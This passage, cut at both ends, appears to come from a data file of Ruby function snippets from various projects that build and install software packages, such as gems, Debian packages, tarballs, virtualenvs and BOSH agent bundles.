schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def input(package)\n path_to_package = download_if_necessary(package, version)\n\n if File.directory?(path_to_package)\n setup_py = File.join(path_to_package, \"setup.py\")\n else\n setup_py = path_to_package\n end\n\n if !File.exist?(setup_py)\n logger.error(\"Could not find 'setup.py'\", :path => setup_py)\n raise \"Unable to find python package; tried #{setup_py}\"\n end\n\n load_package_info(setup_py)\n install_to_staging(setup_py)\n end",
"def needpackage *args\n\t\tpackage *args\n\tend",
"def register_package(package, block = nil, package_set = main_package_set, file = nil)\n invalidate_ignored_package_names\n pkg = PackageDefinition.new(package, package_set, file)\n pkg.add_setup_block(block) if block\n @packages[package.name] = pkg\n metapackage pkg.package_set.name, pkg.autobuild\n metapackage \"#{pkg.package_set.name}.all\", pkg.autobuild\n pkg\n end",
"def package\n @package ||= Package.initialize_from_path(path: \"#{resource_path}/package\",\n client: @client)\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def package!\n Backup::Packager.new(self).package!\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n 
if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def package\n build\n # there is no need for IPA or dSYM unless we have a device/macosx build,\n # so do that part only on iphoneos/macosx SDKs\n #\n if(@configuration.sdk.eql? \"iphoneos\") then\n package_ios_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n elsif (@configuration.sdk.eql? \"macosx\") then\n package_macos_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n else\n package_simulator_app\n end\n end",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def package!\n Packager.package!(self)\n Cleaner.remove_packaging(self)\n end",
"def create(name)\n package = Package.new(name)\n package.name = name\n package.version = '1.0.0'\n empty_directory(name)\n empty_directory(File.join(name, 'operations'))\n empty_directory(File.join(name, 'resources'))\n template('metadata.rb.erb', File.join(name, 'metadata.rb'))\n\n if options[:vagrant]\n template('Vagrantfile.erb', File.join(name, 'Vagrantfile'))\n end\n\n if options[:docker]\n template('Dockerfile.erb.erb', File.join(name, 'Dockerfile.erb'))\n end\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package_dependency(dep, bundle_info)\n info \"Starting packaging #{dep}\"\n\n instance = if dep.is_a? String\n dependency_object_by_name dep\n else\n dep\n end\n\n onError \"Invalid dependency name: #{dep}\" unless instance\n\n files = instance.getInstalledFiles\n\n if !files || files.empty?\n error \"Dependency '#{dep}' has no files to package\"\n return nil\n end\n\n # Add symbolic link targets\n links_found = true\n total_links = 0\n handled = []\n\n while links_found\n\n links_found = false\n\n files.each do |f|\n full = File.join(DependencyInstallFolder, f)\n\n next if handled.include? full\n\n next unless File.exist?(full) && File.symlink?(full)\n\n link_target = File.join(File.dirname(f), File.readlink(full))\n\n unless child_path?(DependencyInstallFolder,\n File.join(DependencyInstallFolder, link_target))\n onError 'symbolic link to be installed points outside the dependency folder: ' +\n link_target.to_s\n end\n\n links_found = true\n total_links += 1\n handled.append full\n files.append link_target\n end\n end\n\n handled = nil\n\n info \"Resolved #{total_links} symbolic links in packaged file list\" if total_links > 0\n\n precompiled_name = instance.getNameForPrecompiled + '_' + CurrentPlatform\n zip_name = precompiled_name + '.tar.xz'\n info_file = precompiled_name + '_info.txt'\n hash_file = precompiled_name + '_hash.txt'\n\n # Check that all exist\n Dir.chdir(DependencyInstallFolder) do\n files.each do |f|\n unless File.exist? f\n onError \"Dependency file that should be packaged doesn't exist: \" + f.to_s\n end\n end\n\n files_to_restore = strip_files_if_needed files\n\n File.open(info_file, 'w') do |f|\n f.puts \"RubySetupSystem precompiled library for #{CurrentPlatform}\"\n f.puts instance.Name + ' retrieved from ' + instance.RepoURL\n f.puts instance.Version.to_s + ' Packaged at ' + Time.now.to_s\n f.puts ''\n f.puts \"You can probably find license from the repo url if it isn't included here\"\n f.puts 'This info file is included in ' + zip_name\n end\n\n # When bundling everything needs to be made clean\n File.unlink zip_name if File.exist?(zip_name) && $options[:bundle]\n\n info \"Compressing files into #{zip_name}\"\n\n # Write a tar file with lzma compression\n runSystemSafe('tar', '-cJf', zip_name, info_file, *files)\n\n restore_stripped_files files_to_restore\n\n onError 'Failed to create zip file' unless File.exist? zip_name\n\n hash = SHA3::Digest::SHA256.file(zip_name).hexdigest\n\n # Write hash to file\n File.open(hash_file, 'w') do |f|\n f.puts hash\n end\n\n success \"Done with #{dep}, created: #{zip_name}\"\n info \"#{zip_name} SHA3: \" + hash\n # info \"#{zip_name} PLATFORM: \" + CurrentPlatform\n bundle_info[:dep_files].append zip_name\n return { name: precompiled_name, hash: hash }\n end\nend",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def package_agent\n @logger.debug \"Packaging Bosh Agent to #{definition_dest_dir}/_bosh_agent.tar\"\n dst = File.join(definition_dest_dir, \"_bosh_agent.tar\")\n if File.directory? @agent_src_path\n Dir.chdir(@agent_src_path) do\n sh(\"bundle package > /dev/null 2>&1 && gem build bosh_agent.gemspec > /dev/null 2>&1\", {:on_error => \"Unable to build Bosh Agent gem\"})\n Dir.chdir(File.join(@agent_src_path, \"vendor\", \"cache\")) do\n sh(\"tar -cf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to package bosh gems\"})\n end\n sh(\"tar -rf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to add bosh_agent gem to #{dst}\"})\n end\n else\n FileUtils.cp @agent_src_path, dst\n end\n end",
"def locate_package(package_name, vers, verbose)\n local = has_local_package?(package_name)\n \n # It's true that we don't have a prerelase check here, but the\n # previous one we had didn't do anything, so it's better to have\n # none than one that doesn't work\n vers = \">= 0\" if vers == \">= 0-pre\"\n src_path = local ? locate_local_package(package_name) : \n BPM::Local.new.source_root(package_name, vers)\n\n return nil unless src_path\n\n pkg = BPM::Package.new(src_path)\n pkg.load_json # throws exception if json invalid\n pkg\n end",
"def with_package &block\n yield @package\n end",
"def create_package(type, data)\n begin\n dirpackage = FPM::Package::Dir.new\n dirpackage.attributes[:chdir] = @tmpdir\n dirpackage.input @libdir\n ospackage = dirpackage.convert(FPM::Package.const_get(@package_type))\n params(ospackage, type, data)\n filename = \"mcollective-#{package.metadata[:name].downcase}-#{type}-#{package.metadata[:version]}-#{package.iteration}#{@arch}.#{@package_type.downcase}\"\n\n do_quietly? do\n ospackage.output(filename)\n end\n\n puts \"Successfully built #{@package_type} '#{filename}'\"\n rescue Exception => e\n puts \"Failed to build package mcollective-#{package.metadata[:name].downcase}-#{type}. - #{e}\"\n ensure\n ospackage.cleanup if ospackage\n dirpackage.cleanup if dirpackage\n end\n end",
"def input(package)\n installdir = attributes[:virtualenv_install_location]\n m = /^([^=]+)==([^=]+)$/.match(package)\n package_version = nil\n\n is_requirements_file = (File.basename(package) == \"requirements.txt\")\n\n if is_requirements_file\n if !File.file?(package)\n raise FPM::InvalidPackageConfiguration, \"Path looks like a requirements.txt, but it doesn't exist: #{package}\"\n end\n\n package = File.join(::Dir.pwd, package) if File.dirname(package) == \".\"\n package_name = File.basename(File.dirname(package))\n logger.info(\"No name given. Using the directory's name\", :name => package_name)\n package_version = nil\n elsif m\n package_name = m[1]\n package_version = m[2]\n self.version ||= package_version\n else\n package_name = package\n package_version = nil\n end\n\n virtualenv_name = package_name\n\n self.name ||= package_name\n\n if self.attributes[:virtualenv_fix_name?]\n self.name = [self.attributes[:virtualenv_package_name_prefix],\n self.name].join(\"-\")\n end\n\n # prefix wins over previous virtual_install_location behaviour\n virtualenv_folder =\n if self.attributes[:prefix]\n self.attributes[:prefix]\n else\n File.join(installdir,\n virtualenv_name)\n end\n\n virtualenv_build_folder = build_path(virtualenv_folder)\n\n ::FileUtils.mkdir_p(virtualenv_build_folder)\n\n if self.attributes[:virtualenv_system_site_packages?]\n logger.info(\"Creating virtualenv with --system-site-packages\")\n safesystem(\"virtualenv\", \"--system-site-packages\", virtualenv_build_folder)\n else\n safesystem(\"virtualenv\", virtualenv_build_folder)\n end\n\n pip_exe = File.join(virtualenv_build_folder, \"bin\", \"pip\")\n python_exe = File.join(virtualenv_build_folder, \"bin\", \"python\")\n\n # Why is this hack here? It looks important, so I'll keep it in.\n safesystem(python_exe, pip_exe, \"install\", \"-U\", \"-i\",\n attributes[:virtualenv_pypi],\n \"pip\")\n\n extra_index_url_args = []\n if attributes[:virtualenv_pypi_extra_index_urls]\n attributes[:virtualenv_pypi_extra_index_urls].each do |extra_url|\n extra_index_url_args << \"--extra-index-url\" << extra_url\n end\n end\n\n find_links_url_args = []\n if attributes[:virtualenv_find_links_urls]\n attributes[:virtualenv_find_links_urls].each do |links_url|\n find_links_url_args << \"--find-links\" << links_url\n end\n end\n\n target_args = []\n if is_requirements_file\n target_args << \"-r\" << package\n else\n target_args << package\n end\n\n pip_args = [python_exe, pip_exe, \"install\", \"-i\", attributes[:virtualenv_pypi]] << extra_index_url_args << find_links_url_args << target_args\n safesystem(*pip_args.flatten)\n\n if attributes[:virtualenv_setup_install?]\n logger.info(\"Running PACKAGE setup.py\")\n setup_args = [python_exe, \"setup.py\", \"install\"]\n safesystem(*setup_args.flatten)\n end\n\n if ! is_requirements_file && package_version.nil?\n frozen = safesystemout(python_exe, pip_exe, \"freeze\")\n frozen_version = frozen[/#{package}==[^=]+$/]\n package_version = frozen_version && frozen_version.split(\"==\")[1].chomp!\n self.version ||= package_version\n end\n\n ::Dir[build_path + \"/**/*\"].each do |f|\n if ! File.readable? 
f\n File.lchmod(File.stat(f).mode | 444)\n end\n end\n\n ::Dir.chdir(virtualenv_build_folder) do\n safesystem(\"virtualenv-tools\", \"--update-path\", virtualenv_folder)\n end\n\n if !attributes[:virtualenv_other_files_dir].nil?\n # Copy all files from other dir to build_path\n Find.find(attributes[:virtualenv_other_files_dir]) do |path|\n src = path.gsub(/^#{attributes[:virtualenv_other_files_dir]}/, '')\n dst = File.join(build_path, src)\n copy_entry(path, dst, preserve=true, remove_destination=true)\n copy_metadata(path, dst)\n end\n end\n\n remove_python_compiled_files virtualenv_build_folder\n\n # use dir to set stuff up properly, mainly so I don't have to reimplement\n # the chdir/prefix stuff special for tar.\n dir = convert(FPM::Package::Dir)\n # don't double prefix the files\n dir.attributes[:prefix] = nil\n if attributes[:chdir]\n dir.attributes[:chdir] = File.join(build_path, attributes[:chdir])\n else\n dir.attributes[:chdir] = build_path\n end\n\n cleanup_staging\n # Tell 'dir' to input \".\" and chdir/prefix will help it figure out the\n # rest.\n dir.input(\".\")\n @staging_path = dir.staging_path\n dir.cleanup_build\n\n end",
"def package_agent\n @logger.info \"Packaging Bosh Agent to #{definition_dest_dir}/_bosh_agent.tar\"\n dst = File.join(definition_dest_dir, \"_bosh_agent.tar\")\n if File.directory? @agent_src_path\n @logger.info \"Tarring up Bosh Agent\"\n Dir.chdir(@agent_src_path) do\n sh(\"tar -cf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to package bosh gems\"})\n end\n else\n FileUtils.cp @agent_src_path, dst\n end\n end",
"def ruby_package(options)\n package_common(:ruby, options) do |pkg|\n # Documentation code. Ignore if the user provided its own documentation\n # task, or disabled the documentation generation altogether by setting\n # rake_doc_task to nil\n if !pkg.has_doc? && pkg.rake_doc_task\n pkg.with_doc\n end\n if !pkg.test_utility.has_task?\n if !pkg.test_utility.source_dir\n test_dir = File.join(pkg.srcdir, 'test')\n if File.directory?(test_dir)\n pkg.test_utility.source_dir = test_dir\n end\n end\n\n if pkg.test_utility.source_dir\n pkg.with_tests\n end\n end\n\n yield(pkg) if block_given?\n end\nend",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def inject_package(hash, info, package)\n arch = info[\"Architecture\"]\n arch = arch == \"all\" ? all_map : [arch]\n arch.map do |arch|\n package_file_name = File.join(\n package_root, package_bucket, origin,\n dist, component, \"binary-#{arch}\",\n File.basename(package)\n )\n hash.deep_merge!(\n \"apt\" => {\n origin => {\n dist => {\n \"components\" => {\n component => {\n \"binary-#{arch}\" => {\n info[\"Package\"] => {\n info[\"Version\"] => info.merge!(\n \"Filename\" => package_file_name,\n \"Size\" => File.size(package),\n ),\n },\n },\n \"binary-i386\" => {},\n },\n },\n },\n },\n },\n )\n File.join(\"apt\", origin, package_file_name)\n end\n end",
"def action_package(type)\n name = prompt('Name : ')\n dest = Automation::Converter.to_unix_path(prompt('Destination : '))\n require REQUIRE_MAP[type] % {name: name}\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{name}'\") unless PACKAGE_CLASS.has_key?(name)\n plugin = PACKAGE_CLASS[name].new\n plugin.package(dest)\n puts \"Packaged '#{type}' - #{plugin.name}\"\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n raise SourcePathMissing unless File.directory?(gem_src_dir)\n raise GemPathMissing if options[:install_dir] && !File.directory?(options[:install_dir])\n \n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = which('thor')\n rake = which('rake')\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return \n end\n else\n raise Merb::GemInstallError, \"No package found for #{gem_name}\"\n end\n # Handle standard installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) { system(\"#{rake} clobber_package; #{rake} package\") } \n end\n \n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '**', 'pkg', '*.gem')].each do |subgem_pkg|\n FileUtils.cp(subgem_pkg, gem_pkg_dir)\n end\n \n # Finally generate the main package and install it; subgems \n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do \n system(\"#{rake} package\")\n FileUtils.cd(gem_pkg_dir) do \n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.dup) \n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return\n end\n end\n end\n raise Merb::GemInstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def deploy(package_path, opts={}, &block)\n end",
"def for_package(package)\n data = File.read(path_for(package))\n hash = JSON.parse(data, symbolize_names: true)\n new(package, hash)\n rescue Errno::ENOENT\n raise NoPackageMetadataFile.new(package.path)\n end",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def package_project(source, dest)\n FileUtils.mkdir_p(dest)\n FileUtils.cp(File.join(source, BUILDFILE), File.join(dest, BUILDFILE))\n PACKAGE_FILES.each do |file|\n cp_if_exists(File.join(source, file), dest)\n end\n rules = @project_config.publish_rules.empty? ? PUBLISH_RULES : @project_config.publish_rules\n\n rules.each do |from, to|\n log.debug \"Processing rule #{from} => #{to}\"\n cp_if_exists(File.join(source, from), File.join(dest, to))\n end\n end",
"def package(name)\n Packaged.instance self , name\n end",
"def generate_package\n if @language_package_service.autograded?\n new_package = @language_package_service.generate_package(@question.attachment)\n @question.file = new_package if new_package.present?\n else\n templates = @language_package_service.submission_templates\n @question.imported_attachment = nil\n @question.import_job_id = nil\n @question.non_autograded_template_files = templates.map do |template|\n Course::Assessment::Question::ProgrammingTemplateFile.new(template)\n end\n end\n end",
"def package_setup\n raise NotImplementedError\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def input(vnd_pkg_path)\n\n # general params\n in_bundle = vnd_pkg_path.gsub(/^(.+\\/+)*vendor\\/+|\\/(?=\\/)|\\/+$/, \"\")\n @name = in_bundle.gsub(/[\\W]+/, \"-\")\n json = {}\n if @once\n @once = true\n raise FPM::InvalidPackageConfiguration, \"You can't input multiple bundle names. Only one package can be built at a time currently. Use a shell loop please.\"\n elsif in_bundle =~ /^composer\\/\\w+\\.\\w+/\n raise FPM::InvalidPackageConfiguration, \"composer/*.* files specified as input. Supply only one bundle id.\"\n end\n\n # copying mode\n if File.exist?(\"vendor/\" + in_bundle)\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n # localize contents below vendor/*/*/ input directory\n ::Dir.chdir(\"./vendor/#{in_bundle}/#{json['target-dir']}/\") do\n FileUtils.cp_r(glob(\"./*\"), build_path)\n end\n else\n # download one package (and dependencies, which are thrown away afterwards)\n ::Dir.chdir(staging_path) do\n ver = attributes[:composer_ver]\n safesystem(\n composer, \"require\", \"--prefer-dist\", \"--update-no-dev\", \"--ignore-platform-reqs\",\n \"--no-ansi\", \"--no-interaction\", in_bundle, *(ver ? [ver] : [])\n )\n # localize Vnd/Pkg folder\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n FileUtils.mv(glob(\"./vendor/#{in_bundle}/#{json['target-dir']}/*\"), build_path)\n FileUtils.rm_r(glob(\"#{staging_path}/*\"))\n end\n end\n\n #-- staging\n # At this point the build_path contains just the actual class files, etc.\n # Conversion to sys/phar/sysphar is handled in convert() along with the\n # dependency translation.\n composer_json_import(json)\n @target_dir = json.include?(\"target-dir\") ? json[\"target-dir\"] : in_bundle\n attributes[:phar_format] = \"zip+gz\" unless attributes[:phar_format_given?]\n end",
"def packaging\n compiler && @compiler.class.packaging\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def is_metapackage?(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite is_metapackage?\"\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n if !File.directory?(gem_src_dir)\n raise \"Missing rubygem source path: #{gem_src_dir}\"\n end\n if options[:install_dir] && !File.directory?(options[:install_dir])\n raise \"Missing rubygems path: #{options[:install_dir]}\"\n end\n\n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = \"#{Gem.ruby} -S #{which('thor')}\"\n rake = \"#{Gem.ruby} -S #{which('rake')}\"\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return true\n end\n else\n raise Gem::InstallError, \"No package found for #{gem_name}\"\n end\n # Handle standard installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) do \n system(\"#{rake} clobber_package; #{rake} package\")\n end\n end\n\n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '*', 'pkg', '*.gem')].each do |subgem_pkg|\n dest = 